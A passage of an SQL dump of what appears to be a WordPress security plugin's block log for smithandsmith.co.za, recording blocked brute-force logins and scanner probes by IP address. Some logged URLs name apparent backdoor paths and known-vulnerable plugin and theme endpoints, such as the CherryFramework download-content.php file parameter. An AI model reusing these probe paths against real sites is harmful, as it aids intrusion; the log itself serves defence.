21:17:01','185.159.156.20','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5474,'2022-03-02 21:17:03','185.159.156.20','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5475,'2022-03-02 23:26:21','69.63.64.21','https://smithandsmith.co.za/wp-login.php','404shield',''),(5476,'2022-03-03 12:52:00','20.120.21.52','https://smithandsmith.co.za/wp-admin/style.php','404shield',''),(5477,'2022-03-03 12:52:20','20.120.21.52','https://smithandsmith.co.za/wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','404shield',''),(5478,'2022-03-03 12:52:41','20.120.21.52','https://smithandsmith.co.za/wp-admin.php?daksldlkdsadas=1','404shield',''),(5479,'2022-03-03 13:51:17','185.243.218.41','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5480,'2022-03-03 13:51:19','185.243.218.41','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5481,'2022-03-03 13:51:20','185.243.218.41','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5482,'2022-03-03 14:23:40','142.4.206.84','https://smithandsmith.co.za/wp-login.php','404shield',''),(5483,'2022-03-03 14:23:43','142.4.206.84','https://smithandsmith.co.za/wp-login.php','404shield',''),(5484,'2022-03-03 14:23:45','142.4.206.84','https://smithandsmith.co.za/wp-login.php','404shield',''),(5485,'2022-03-03 20:35:19','84.247.59.180','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5486,'2022-03-03 20:35:23','84.247.59.180','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5487,'2022-03-03 20:35:25','84.247.59.180','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5488,'2022-03-04 01:06:51','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5489,'2022-03-04 02:47:12','161.35.192.48','https://smithandsmith.co.za/wp-admin/install.php','404shield',''),(5490,'2022-03-04 08:29:28','185.159.156.6','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5491,'2022-03-04 08:29:30','185.159.156.6','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5492,'2022-03-04 08:29:32','185.159.156.6','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5493,'2022-03-04 08:31:04','185.159.156.20','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5494,'2022-03-04 08:31:06','185.159.156.20','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5495,'2022-03-04 08:31:07','185.159.156.20','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5496,'2022-03-04 09:00:07','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5497,'2022-03-04 09:00:12','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5498,'2022-03-04 09:00:13','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5499,'2022-03-04 23:56:55','68.178.223.197','https://smithandsmith.co.za/wp-login.php','404shield',''),(5500,'2022-03-05 15:30:42','199.249.230.65','https://smithandsmith.co.za/wp-login.php','404shield',''),(5501,'2022-03-05 15:30:45','199.249.230.65','https://smithandsmith.co.za/wp-login.php','404shield',''),(5502,'2022-03-05 15:30:46','199.249.230.65','https://smithandsmith.co.za/wp-login.php','404shield',''),(5503,'2022-03-05 16:04:15','172.107.241.110','https://smithandsmith.co.za/wp-login.php','404shield',''),(5504,'2022-03-05 16:04:29','172.107.241.110','https://smithandsmith.co.za/wp-login.php','404shield',''),(5505,'2022-03-06 00:57:53','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5506,'2022-03-06 01:31:48','72.167.124.64','https://smithandsmith.co.za/wp-login.php','404shield',''),(5507,'2022-03-06 08:43:43','185.159.156.20','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5508,'2022-03-06 08:43:44','185.159.156.20','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5509,'2022-03-06 08:43:45','185.159.156.20','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5510,'2022-03-06 11:36:14','185.159.156.6','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5511,'2022-03-06 11:36:15','185.159.156.6','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5512,'2022-03-06 11:36:17','185.159.156.6','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5513,'2022-03-06 13:47:16','192.42.116.23','https://smithandsmith.co.za/wp-login.php','404shield',''),(5514,'2022-03-06 13:47:17','192.42.116.23','https://smithandsmith.co.za/wp-login.php','404shield',''),(5515,'2022-03-06 13:47:18','192.42.116.23','https://smithandsmith.co.za/wp-login.php','404shield',''),(5516,'2022-03-06 14:23:26','109.70.100.29','https://smithandsmith.co.za/wp-login.php','404shield',''),(5517,'2022-03-06 14:23:28','109.70.100.29','https://smithandsmith.co.za/wp-login.php','404shield',''),(5518,'2022-03-06 14:23:29','109.70.100.29','https://smithandsmith.co.za/wp-login.php','404shield',''),(5519,'2022-03-06 14:40:08','191.96.145.244','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5520,'2022-03-06 14:40:12','191.96.145.244','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5521,'2022-03-06 14:40:16','191.96.145.244','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5522,'2022-03-06 18:33:23','107.190.135.178','https://smithandsmith.co.za/wp-login.php','404shield',''),(5523,'2022-03-07 01:19:44','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5524,'2022-03-07 08:49:15','165.227.129.197','https://smithandsmith.co.za/wp-login.php','404shield',''),(5525,'2022-03-07 11:00:22','185.220.101.140','https://smithandsmith.co.za/wp-login.php','404shield',''),(5526,'2022-03-07 11:00:25','185.220.101.140','https://smithandsmith.co.za/wp-login.php','404shield',''),(5527,'2022-03-07 11:00:25','185.220.101.140','https://smithandsmith.co.za/wp-login.php','404shield',''),(5528,'2022-03-07 11:36:01','185.247.226.69','https://smithandsmith.co.za/wp-login.php','404shield',''),(5529,'2022-03-07 11:36:08','185.247.226.69','https://smithandsmith.co.za/wp-login.php','404shield',''),(5530,'2022-03-07 11:36:10','185.247.226.69','https://smithandsmith.co.za/wp-login.php','404shield',''),(5531,'2022-03-08 04:39:06','2.56.57.26','https://smithandsmith.co.za/wp-admin/style.php','404shield',''),(5532,'2022-03-08 04:43:37','2.56.57.26','https://smithandsmith.co.za/wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','404shield',''),(5533,'2022-03-08 04:54:22','2.56.57.26','https://smithandsmith.co.za/wp-admin.php?daksldlkdsadas=1','404shield',''),(5534,'2022-03-08 04:59:31','2.56.57.26','https://smithandsmith.co.za/wp-content/export.php','404shield',''),(5535,'2022-03-08 05:03:28','2.56.57.26','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(5536,'2022-03-08 07:42:08','185.159.156.6','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5537,'2022-03-08 07:42:10','185.159.156.6','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5538,'2022-03-08 07:42:12','185.159.156.6','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5539,'2022-03-08 13:36:32','94.102.56.9','https://smithandsmith.co.za/wp-login.php','404shield',''),(5540,'2022-03-08 13:36:34','94.102.56.9','https://smithandsmith.co.za/wp-login.php','404shield',''),(5541,'2022-03-08 13:36:35','94.102.56.9','https://smithandsmith.co.za/wp-login.php','404shield',''),(5542,'2022-03-08 13:51:36','36.94.142.166','https://smithandsmith.co.za/wp-login.php','404shield',''),(5543,'2022-03-08 14:10:39','94.142.241.194','https://smithandsmith.co.za/wp-login.php','404shield',''),(5544,'2022-03-08 14:10:41','94.142.241.194','https://smithandsmith.co.za/wp-login.php','404shield',''),(5545,'2022-03-08 14:10:42','94.142.241.194','https://smithandsmith.co.za/wp-login.php','404shield',''),(5546,'2022-03-08 16:42:41','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5547,'2022-03-08 18:24:54','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5548,'2022-03-08 22:56:10','167.114.159.131','https://smithandsmith.co.za/wp-admin/install.php','404shield',''),(5549,'2022-03-08 22:56:10','167.114.159.131','https://smithandsmith.co.za/wp-login.php','404shield',''),(5550,'2022-03-09 01:11:25','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5551,'2022-03-09 01:13:42','54.91.162.156','https://smithandsmith.co.za/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php','404shield',''),(5552,'2022-03-09 01:13:42','54.91.162.156','https://smithandsmith.co.za/wp-content/plugins/superlogoshowcase-wp/sls-wp-admin/pages/import.php','404shield',''),(5553,'2022-03-09 01:13:43','54.91.162.156','https://smithandsmith.co.za/wp-content/plugins/super-interactive-maps/sim-wp-admin/pages/import.php','404shield',''),(5554,'2022-03-09 01:56:06','91.201.55.189','https://smithandsmith.co.za/wp-login.php','404shield',''),(5555,'2022-03-09 06:19:24','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5556,'2022-03-09 09:32:57','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5557,'2022-03-09 11:37:28','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5558,'2022-03-09 13:29:23','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5559,'2022-03-09 14:25:22','185.100.87.202','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5560,'2022-03-09 14:25:23','185.100.87.202','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5561,'2022-03-09 14:25:24','185.100.87.202','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5562,'2022-03-09 14:36:39','208.109.36.200','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(5563,'2022-03-09 14:51:01','93.114.235.167','https://smithandsmith.co.za/wp-login.php','404shield',''),(5564,'2022-03-09 15:00:47','107.189.31.102','https://smithandsmith.co.za/wp-login.php','404shield',''),(5565,'2022-03-09 15:00:50','107.189.31.102','https://smithandsmith.co.za/wp-login.php','404shield',''),(5566,'2022-03-09 15:00:51','107.189.31.102','https://smithandsmith.co.za/wp-login.php','404shield',''),(5567,'2022-03-09 15:33:08','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5568,'2022-03-09 20:25:57','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5569,'2022-03-09 22:25:49','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5570,'2022-03-10 00:12:47','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5571,'2022-03-10 01:59:42','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5572,'2022-03-10 03:46:20','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5573,'2022-03-10 05:33:10','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5574,'2022-03-10 06:51:31','138.199.7.133','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5575,'2022-03-10 06:51:33','138.199.7.133','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5576,'2022-03-10 06:51:34','138.199.7.133','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5577,'2022-03-10 07:04:11','138.199.7.132','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5578,'2022-03-10 07:04:13','138.199.7.132','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5579,'2022-03-10 07:04:14','138.199.7.132','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5580,'2022-03-10 07:11:18','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5581,'2022-03-10 08:16:22','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5582,'2022-03-10 09:21:35','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5583,'2022-03-10 10:26:55','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5584,'2022-03-10 11:32:16','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5585,'2022-03-10 12:37:25','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5586,'2022-03-10 13:19:47','121.128.161.22','https://smithandsmith.co.za/wp-login.php','404shield',''),(5587,'2022-03-10 13:22:01','121.128.161.22','http://smithandsmith.co.za/administrator/','adminpw',''),(5588,'2022-03-10 13:43:00','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5589,'2022-03-10 14:48:41','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5590,'2022-03-10 15:07:44','141.95.18.225','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5591,'2022-03-10 15:07:45','141.95.18.225','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5592,'2022-03-10 15:07:45','141.95.18.225','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5593,'2022-03-10 15:41:57','185.220.100.243','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5594,'2022-03-10 15:41:59','185.220.100.243','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5595,'2022-03-10 15:42:01','185.220.100.243','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5596,'2022-03-10 15:42:11','185.220.101.8','https://smithandsmith.co.za/wp-login.php','404shield',''),(5597,'2022-03-10 15:53:47','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5598,'2022-03-10 16:49:24','213.202.252.251','https://smithandsmith.co.za/wp-login.php','404shield',''),(5599,'2022-03-10 17:02:14','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5600,'2022-03-10 18:12:53','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5601,'2022-03-10 19:23:21','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5602,'2022-03-10 20:34:21','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5603,'2022-03-10 21:45:08','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5604,'2022-03-10 22:56:39','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5605,'2022-03-11 00:07:46','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5606,'2022-03-11 01:18:57','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5607,'2022-03-11 01:38:47','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5608,'2022-03-11 02:29:20','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5609,'2022-03-11 03:40:22','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5610,'2022-03-11 04:50:46','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5611,'2022-03-11 06:01:30','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5612,'2022-03-11 07:11:54','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5613,'2022-03-11 08:22:30','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5614,'2022-03-11 09:33:07','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5615,'2022-03-11 10:43:54','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5616,'2022-03-11 11:50:44','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5617,'2022-03-11 12:57:48','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5618,'2022-03-11 13:00:07','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5619,'2022-03-11 13:02:12','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5620,'2022-03-11 13:35:01','85.195.206.139','https://smithandsmith.co.za/wp-login.php','404shield',''),(5621,'2022-03-11 13:35:03','85.195.206.139','https://smithandsmith.co.za/wp-login.php','404shield',''),(5622,'2022-03-11 13:35:04','85.195.206.139','https://smithandsmith.co.za/wp-login.php','404shield',''),(5623,'2022-03-11 14:04:59','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5624,'2022-03-11 14:06:45','185.220.102.6','https://smithandsmith.co.za/wp-login.php','404shield',''),(5625,'2022-03-11 14:06:47','185.220.102.6','https://smithandsmith.co.za/wp-login.php','404shield',''),(5626,'2022-03-11 14:06:48','185.220.102.6','https://smithandsmith.co.za/wp-login.php','404shield',''),(5627,'2022-03-11 14:06:51','194.32.107.159','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5628,'2022-03-11 14:06:52','194.32.107.159','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5629,'2022-03-11 14:17:34','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5630,'2022-03-11 14:30:35','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5631,'2022-03-11 14:43:11','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5632,'2022-03-11 14:55:43','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5633,'2022-03-11 15:08:16','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5634,'2022-03-11 15:20:50','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5635,'2022-03-11 15:33:38','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5636,'2022-03-11 15:46:16','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5637,'2022-03-11 15:50:20','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5638,'2022-03-11 16:02:56','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5639,'2022-03-11 16:15:52','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5640,'2022-03-11 16:28:13','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5641,'2022-03-11 16:40:42','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5642,'2022-03-11 16:50:03','31.210.20.114','https://smithandsmith.co.za/wp-admin/includes/','404shield',''),(5643,'2022-03-11 16:53:13','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5644,'2022-03-11 17:00:07','35.195.135.67','https://smithandsmith.co.za/wp-login.php','404shield',''),(5645,'2022-03-11 17:05:44','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5646,'2022-03-11 17:18:23','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5647,'2022-03-11 17:30:55','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5648,'2022-03-11 17:43:25','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5649,'2022-03-11 17:56:38','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5650,'2022-03-11 18:09:20','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5651,'2022-03-11 18:21:55','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5652,'2022-03-11 18:34:36','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5653,'2022-03-11 18:47:10','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5654,'2022-03-11 19:00:11','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5655,'2022-03-11 19:02:55','194.31.98.217','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(5656,'2022-03-11 19:13:29','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5657,'2022-03-11 19:26:03','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5658,'2022-03-11 19:38:35','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5659,'2022-03-11 19:51:10','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5660,'2022-03-11 20:03:43','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5661,'2022-03-11 20:16:18','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5662,'2022-03-11 20:28:52','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5663,'2022-03-11 20:41:25','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5664,'2022-03-11 20:53:59','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5665,'2022-03-11 21:06:40','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5666,'2022-03-11 21:19:32','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5667,'2022-03-11 21:32:18','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5668,'2022-03-11 21:45:12','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5669,'2022-03-11 21:58:10','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5670,'2022-03-11 22:10:59','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5671,'2022-03-11 22:23:59','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5672,'2022-03-11 22:36:50','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5673,'2022-03-11 22:45:16','208.109.72.251','https://smithandsmith.co.za/wp-content/themes/twentyseventeen/404.php','404shield',''),(5674,'2022-03-11 22:49:49','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5675,'2022-03-11 23:02:52','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5676,'2022-03-11 23:10:16','194.31.98.217','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(5677,'2022-03-11 23:15:54','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5678,'2022-03-11 23:29:00','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5679,'2022-03-11 23:42:18','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5680,'2022-03-11 23:55:08','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5681,'2022-03-12 00:08:07','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5682,'2022-03-12 00:21:07','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5683,'2022-03-12 00:34:19','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5684,'2022-03-12 00:47:27','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5685,'2022-03-12 01:00:18','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5686,'2022-03-12 01:13:14','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5687,'2022-03-12 01:26:11','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5688,'2022-03-12 01:39:06','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5689,'2022-03-12 01:52:07','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5690,'2022-03-12 02:05:13','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5691,'2022-03-12 02:18:12','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5692,'2022-03-12 02:31:17','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5693,'2022-03-12 02:44:25','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5694,'2022-03-12 02:57:20','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5695,'2022-03-12 11:22:46','138.199.7.132','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5696,'2022-03-12 11:22:49','138.199.7.132','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5697,'2022-03-12 11:22:50','138.199.7.132','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5698,'2022-03-12 19:16:01','188.214.152.228','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5699,'2022-03-12 19:16:09','188.214.152.228','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5700,'2022-03-12 19:16:13','188.214.152.228','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5701,'2022-03-12 21:39:10','88.208.209.101','https://smithandsmith.co.za/wp-login.php','404shield',''),(5702,'2022-03-13 01:29:08','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5703,'2022-03-13 02:26:06','40.79.29.204','https://smithandsmith.co.za/wp-login.php','404shield',''),(5704,'2022-03-13 02:26:06','40.79.29.204','https://smithandsmith.co.za/wp-login.php','404shield',''),(5705,'2022-03-13 02:26:06','40.79.29.204','https://smithandsmith.co.za/wp-login.php','404shield',''),(5706,'2022-03-13 04:14:52','66.70.140.26','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(5707,'2022-03-13 06:05:53','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5708,'2022-03-13 06:09:12','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5709,'2022-03-13 12:12:19','194.38.20.161','https://smithandsmith.co.za/wp-content/themes/CherryFramework/includes/plugins/cherry-plugin/admin/css/tinymce-shortcodes.css','404shield',''),(5710,'2022-03-13 15:40:05','144.217.12.17','https://smithandsmith.co.za/wp-login.php','404shield',''),(5711,'2022-03-13 17:34:44','185.185.134.116','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5712,'2022-03-13 17:34:46','185.185.134.116','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5713,'2022-03-13 17:34:48','185.185.134.116','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5714,'2022-03-13 20:40:50','194.38.20.161','https://smithandsmith.co.za/wp-content/themes/CherryFramework/includes/plugins/cherry-plugin/admin/import-export/download-content.php?file=upload.php','404shield',''),(5715,'2022-03-13 23:14:31','20.96.126.129','https://smithandsmith.co.za/wp-login.php','404shield',''),(5716,'2022-03-13 23:14:31','20.96.126.129','https://smithandsmith.co.za/wp-login.php','404shield',''),(5717,'2022-03-13 23:14:31','20.96.126.129','https://smithandsmith.co.za/wp-login.php','404shield',''),(5718,'2022-03-14 01:49:48','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5719,'2022-03-14 07:25:53','46.101.11.222','https://smithandsmith.co.za/wp-login.php','404shield',''),(5720,'2022-03-14 09:05:19','77.68.6.111','https://smithandsmith.co.za/wp-login.php','404shield',''),(5721,'2022-03-14 12:49:34','167.88.160.248','https://smithandsmith.co.za/wp-login.php','404shield',''),(5722,'2022-03-14 17:35:41','92.204.217.252','https://smithandsmith.co.za/wp-login.php','404shield',''),(5723,'2022-03-15 21:10:40','194.31.98.217','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(5724,'2022-03-16 01:28:45','210.113.34.226','https://smithandsmith.co.za/wp-login.php','404shield',''),(5725,'2022-03-16 01:39:46','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5726,'2022-03-16 05:18:24','185.220.101.49','http://smithandsmith.co.za/contact/','httpbl',''),(5727,'2022-03-16 05:18:24','185.220.101.49','http://smithandsmith.co.za/','httpbl',''),(5728,'2022-03-16 07:15:44','173.212.214.140','https://smithandsmith.co.za/wp-login.php','404shield',''),(5729,'2022-03-16 07:21:45','185.185.134.116','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5730,'2022-03-16 07:21:48','185.185.134.116','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5731,'2022-03-16 07:21:50','185.185.134.116','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5732,'2022-03-16 08:19:57','188.214.152.228','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5733,'2022-03-16 08:20:01','188.214.152.228','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5734,'2022-03-16 08:20:06','188.214.152.228','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5735,'2022-03-16 18:41:07','103.109.30.30','https://smithandsmith.co.za/wp-login.php','404shield',''),(5736,'2022-03-17 14:25:19','20.106.149.170','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(5737,'2022-03-17 14:26:15','20.106.149.170','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(5738,'2022-03-17 18:11:19','153.232.113.151','https://smithandsmith.co.za/wp-login.php','404shield',''),(5739,'2022-03-17 22:07:51','104.244.77.235','https://smithandsmith.co.za/wp-login.php','404shield',''),(5740,'2022-03-17 22:07:53','104.244.77.235','https://smithandsmith.co.za/wp-login.php','404shield',''),(5741,'2022-03-17 22:07:54','104.244.77.235','https://smithandsmith.co.za/wp-login.php','404shield',''),(5742,'2022-03-17 23:03:52','109.70.100.83','https://smithandsmith.co.za/wp-login.php','404shield',''),(5743,'2022-03-17 23:03:54','109.70.100.83','https://smithandsmith.co.za/wp-login.php','404shield',''),(5744,'2022-03-17 23:03:54','109.70.100.83','https://smithandsmith.co.za/wp-login.php','404shield',''),(5745,'2022-03-18 01:41:46','184.168.103.26','https://smithandsmith.co.za/wp-login.php','404shield',''),(5746,'2022-03-18 02:08:23','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5747,'2022-03-18 07:19:22','185.185.134.116','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5748,'2022-03-18 